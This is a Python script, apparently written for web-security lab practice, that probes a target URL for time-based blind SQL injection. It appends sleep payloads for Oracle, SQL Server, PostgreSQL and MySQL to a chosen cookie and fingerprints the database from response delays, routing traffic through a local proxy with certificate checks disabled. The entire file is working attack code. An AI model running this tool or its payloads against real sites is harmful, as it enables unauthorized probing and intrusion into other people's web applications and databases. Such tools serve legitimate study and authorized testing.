import sys
import time
import requests
import urllib.parse
import urllib3
from typing import Dict, Optional

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

DB_PAYLOADS = {
    "Oracle": "dbms_pipe.receive_message(('a'),10)",
    "Microsoft SQL Server": "WAITFOR DELAY '0:0:10'",
    "PostgreSQL": "SELECT pg_sleep(10)",
    "MySQL": "SELECT SLEEP(10)",
}


def get_initial_cookies(url: str) -> Dict[str, str]:
    print("(i) Fetching initial cookies from server...")
    try:
        response = requests.get(url, verify=False, proxies=proxies)
        cookies = requests.utils.dict_from_cookiejar(response.cookies)
        if not cookies:
            print("[-] No cookies returned. Cannot proceed.")
            sys.exit(1)

        print("(+) Cookies received:")
        for name, value in cookies.items():
            print(f"    {name} = {value}")

        return cookies
    except requests.exceptions.RequestException as e:
        print(f"[-] Failed to fetch cookies: {e}")
        sys.exit(1)


def select_injection_cookie(cookies: Dict[str, str]) -> str:
    print("\n(?) Choose the cookie to inject payload into:")
    keys = list(cookies.keys())
    for idx, name in enumerate(keys, 1):
        print(f"  {idx}. {name}")

    while True:
        try:
            choice = int(input("Enter choice number: "))
            if 1 <= choice <= len(keys):
                return keys[choice - 1]
        except (ValueError, IndexError):
            pass
        print("[-] Invalid selection. Try again.")


def test_sqli_payload(
    url: str, cookies: Dict[str, str], injection_cookie: str, payload: str
) -> float:
    encoded_payload = urllib.parse.quote(f"' || ({payload})--")
    test_cookies = cookies.copy()
    test_cookies[injection_cookie] += encoded_payload

    try:
        start = time.time()
        requests.get(
            url, cookies=test_cookies, verify=False, proxies=proxies, timeout=15
        )
        end = time.time()
        return round(end - start, 2)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return 0.0


def detect_database(
    url: str, cookies: Dict[str, str], injection_cookie: str
) -> Optional[str]:
    print("\n(i) Attempting to fingerprint the database using time-based blind SQLi...")
    for db, payload in DB_PAYLOADS.items():
        print(f"(•) Testing for {db}... ", end="", flush=True)
        response_time = test_sqli_payload(url, cookies, injection_cookie, payload)

        if response_time >= 9.0:
            print(
                f"\n(+) Database fingerprinted: {db} (response time: {response_time}s)"
            )
            return db
        else:
            print(f"(not {db}) response time: {response_time}s")

    print("(-) Could not determine the backend database.")
    return None


def main():
    if len(sys.argv) != 2:
        print(f"(+) Usage: {sys.argv[0]} <url>")
        print(f"(+) Example: {sys.argv[0]} https://target.com")
        sys.exit(1)

    url = sys.argv[1].strip("/")

    print(f"(+) Checking {url} for time-based blind SQL injection...")

    cookies = get_initial_cookies(url)
    injection_cookie = select_injection_cookie(cookies)
    db_type = detect_database(url, cookies, injection_cookie)

    if db_type:
        print(f"(✓) {url} appears vulnerable to blind SQLi using {db_type} payloads.")
    else:
        print("(-) Target may not be vulnerable or timing threshold wasn't met.")


if __name__ == "__main__":
    main()